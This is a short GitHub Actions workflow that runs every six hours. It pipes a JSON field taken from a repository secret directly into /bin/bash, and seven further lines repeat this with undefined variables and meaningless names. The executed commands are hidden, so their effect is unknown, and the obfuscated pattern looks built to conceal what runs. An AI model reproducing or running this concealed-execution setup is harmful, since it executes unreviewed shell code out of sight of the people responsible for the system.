name: wurenwenfeng
on:
  workflow_dispatch:
  schedule:
    - cron: '13 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wurenwenfeng
        env:
          fca75147: ${{ secrets.fca75147 }}
        run: |
          echo $fca75147 | jq -r .pk4 | /bin/bash
          echo $f79613 | jq -r .aa78615 | /bin/bash
          echo $our0816 | jq -r .zel9706 | /bin/bash
          echo $qiak89925 | jq -r .pvgo2 | /bin/bash
          echo $jiaxo341 | jq -r .lnca61 | /bin/bash
          echo $sb87 | jq -r .d5594 | /bin/bash
          echo $z5639 | jq -r .ls1 | /bin/bash
          echo $ir351 | jq -r .hi23448 | /bin/bash

